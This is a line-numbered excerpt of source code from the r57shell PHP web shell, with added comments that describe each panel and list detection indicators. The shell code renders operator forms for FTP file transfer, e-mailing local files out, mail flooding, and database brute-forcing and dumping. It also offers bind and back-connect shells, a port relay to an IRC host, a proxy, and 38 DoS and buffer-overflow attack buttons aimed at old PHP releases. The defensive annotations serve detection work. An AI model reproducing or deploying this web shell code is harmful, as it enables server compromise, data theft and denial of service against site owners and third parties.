7398echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7399
7400echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7401
7402echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7403
7404echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
7405
7406echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7407
7408echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7409
7410echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
7411
7412
7413
// Panel 3: cmd='ftp_file_up'.
7414echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7415
7416echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
7417
7418echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7419
7420echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7421
7422echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7423
7424echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7425
7426echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
7427
7428echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7429
7430echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
7431
7432
7433
7434echo $te."</td>".$fe."</tr></div></table>";
7435
7436}
7437
7438
7439
7440
7441
// Mail panels, rendered only when PHP's mail() function exists.
// Three forms are emitted, distinguished by their hidden 'cmd' value:
//   'mail'        - fields to, from, subj, text
//   'mail_file'   - fields to, from, subj, loc_file, compress (reuses $arh built by the download panel)
//   'mail_bomber' - fields to, from, subj, text, mail_flood (default 100), mail_size (default 10, labelled kb)
// Text fields are pre-filled from the previous $_POST value or a hard-coded default; the textarea content
// is concatenated directly into the markup.
// Defender note: 'cmd=mail_file' is a second exfiltration path (local file sent by e-mail) and
// 'cmd=mail_bomber' abuses the host's MTA; both show up as unusual outbound mail volume from the web
// server account and as these 'cmd' / 'mail_flood' / 'mail_size' parameters in POST bodies.
7442if(@function_exists("mail")){
7443
7444echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7445
// Panel 1: cmd='mail'.
7446echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
7447
7448echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
7449
7450echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7451
7452echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7453
7454echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
7455
7456echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7457
7458
7459
// Panel 2: cmd='mail_file'. The default subject contains the literal string "file from r57shell".
7460echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7461
7462echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
7463
7464echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
7465
7466echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7467
7468echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
7469
7470echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
7471
7472echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7473
7474echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7475
7476
7477
// Panel 3: cmd='mail_bomber'.
7478echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7479
7480echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
7481
7482echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
7483
7484echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7485
7486echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7487
7488echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
7489
7490echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
7491
7492echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7493
7494
7495
7496echo $te."</td>".$fe."</tr></div></table>";
7497
7498}
7499
7500
7501
7502
7503
// Database panels, rendered when at least one of the *_on driver flags is set (the flags are assigned
// outside this excerpt). $select becomes a <select name=db> listing only the drivers flagged as available.
// Three forms are emitted, distinguished by their hidden 'cmd' value:
//   'db_brute'   - fields db, db_server, db_port, mysql_db, brute_method, reverse, mysql_l, dictionary
//   'mysql_dump' - fields db, db_server, db_port, mysql_l, mysql_p, mysql_db, mysql_tbl, dif, dif_name
//   'db_query'   - fields db, db_server, db_port, mysql_l, mysql_p, mysql_db, db_query
// Text fields are pre-filled from the previous $_POST value or a hard-coded default.
// Defender note: the shell lets its operator reach databases from the web server's network position,
// by default 'localhost'. Indicators: these 'cmd' values and the 'mysql_l' / 'mysql_p' / 'db_query'
// parameter names in POST bodies, plus database logins from the web host that do not match the
// application's own account or query patterns.
7504if($mysql_on||$mssql_on||$pg_on||$ora_on||$mysqli_on||$msql_on||$sqlite_on)
7505
7506{
7507
7508$select = '<select name=db>';
7509
7510if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
7511
7512if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
7513
7514if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
7515
7516if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
7517
7518if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
7519
7520if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
7521
7522if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
7523
7524$select .= '</select>';
7525
7526
7527
// Panel 1: cmd='db_brute'.
7528echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7529
7530echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
7531
7532
7533
7534echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
7535
7536echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7537
7538echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7539
7540echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7541
7542echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7543
7544echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7545
7546echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
7547
7548echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7549
7550echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
7551
7552
7553
// Panel 2: cmd='mysql_dump'. The 'dif' checkbox and 'dif_name' (default 'dump.sql') are posted with it;
// how the handler uses them is not visible in this excerpt.
7554echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7555
7556echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
7557
7558
7559
7560echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7561
7562echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7563
7564echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7565
7566echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
7567
7568echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
7569
7570echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
7571
7572
7573
// Panel 3: cmd='db_query'. The textarea is pre-filled with the previous query or a fixed set of
// enumeration statements.
7574echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7575
7576echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
7577
7578
7579
7580echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7581
7582echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7583
7584echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7585
7586echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7587
7588echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
7589
7590echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
7591
7592
7593
7594echo "</td>".$fe."</tr></div></table>";
7595
7596}
7597
7598
7599
7600
7601
// Network panels, rendered only when $safe_mode is false and $unix is true (both set outside this excerpt).
// Four forms are emitted. Unlike the other panels, none of them carries a hidden 'cmd' field, so the
// handler presumably dispatches on the field names themselves -- confirm against the request handling code.
//   form 1: port (default 11457), bind_pass (default 'r57'), use ('Perl' or 'C')
//   form 2: ip (default: the requester's REMOTE_ADDR, else 127.0.0.1), port (default 11457), use
//   form 3: local_port (11457), remote_host ('irc.dalnet.ru'), remote_port (6667), use (labelled datapipe.pl / datapipe.c)
//   form 4: proxy_port (default 31337), use ('Perl' only); this panel's heading is the literal 'Proxy'
// The panel headings for forms 1-3 come from $lang entries not visible here; the field names suggest a
// password-protected listener, an outbound connection to a chosen host, and a port relay respectively.
// Defender note: the hard-coded defaults are useful hunting values when left unchanged -- a listener owned
// by the web server account on TCP 11457 or 31337, or outbound connections from that account to the
// requesting client's address. The 'use' selector implies a Perl interpreter or C compiler is invoked on
// the host, so child processes of the web server / PHP worker are a further detection point.
7602if(!$safe_mode && $unix){
7603
7604echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
7605
7606echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
7607
7608echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
7609
7610echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
7611
7612echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7613
7614echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
7615
7616echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7617
7618echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
7619
7620echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
7621
7622echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
7623
7624echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7625
7626echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
7627
7628echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7629
7630echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
7631
7632echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
7633
7634echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
7635
7636echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
7637
7638echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
7639
7640echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7641
7642echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7643
7644echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
7645
7646echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
7647
7648echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
7649
7650echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7651
7652echo $te."</td>".$fe."</tr></div></table>";
7653
7654}
7655
7656
7657
// Final panel and page footer. This part only renders buttons; the code each button triggers lives in
// the request handler outside this excerpt.
// Each row is its own one-button form ($fs ... $fe) posting hidden cmd='dosN' for N = 1..38, spread over
// four table columns. The button captions name a PHP function or component and, for most entries, the
// PHP version range the author claims is affected (all are PHP 4.4.x / 5.1.x / 5.2.x era).
// Defender note: going by those captions, the entries target long-superseded PHP releases, so runtime
// patch level is the primary mitigation; a POST body matching cmd=dos<number> is a high-confidence
// indicator of this shell regardless of whether the target is vulnerable.
7658echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
7659
7660echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7661
7662echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
7663
7664echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
7665
7666echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
7667
7668echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
7669
7670echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
7671
7672echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
7673
7674echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
7675
7676echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
7677
7678echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
7679
7680echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
7681
7682echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
7683
7684echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
7685
// Second column: dos13 .. dos24.
7686echo $te."</td><td valign=top width=25%>".$ts;
7687
7688echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7689
7690echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
7691
7692echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
7693
7694echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
7695
7696echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
7697
7698echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
7699
7700echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
7701
7702echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
7703
7704echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
7705
7706echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
7707
7708echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
7709
7710echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
7711
7712echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
7713
// Third column: dos25 .. dos36.
7714echo $te."</td><td valign=top width=25%>".$ts;
7715
7716echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7717
7718echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
7719
7720echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
7721
7722echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
7723
7724echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
7725
7726echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
7727
7728echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
7729
7730echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
7731
7732echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
7733
7734echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
7735
7736echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
7737
7738echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
7739
7740echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
7741
// Fourth column: dos37 and dos38, followed by a commented-out template row with empty placeholders.
7742echo $te."</td><td valign=top width=25%>".$ts;
7743
7744echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7745
7746echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
7747
7748echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
7749
7750/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
7751
7752echo $te."</td></tr></div></table>";
7753
// Footer banner: prints the shell name, $version, an attribution link and the page generation time.
// 'starttime' is written without a '$', so it is read as a constant -- presumably define()d near the
// top of the file; confirm there.
// Defender note: the literal text "r57shell | version" in an HTTP response body is a simple content
// signature for this family and works for response inspection as well as for on-disk file scanning.
7754echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version ".$version." | <a href=http://www.c99php.com/>r57shell v.1.42 Edited By KingDefacer</a> | Generation time: ".round(getmicrotime()-starttime,4)." ]---o</b></font></div></td></tr></table>";
7755
7756echo '</body></html>';
7757
7758?>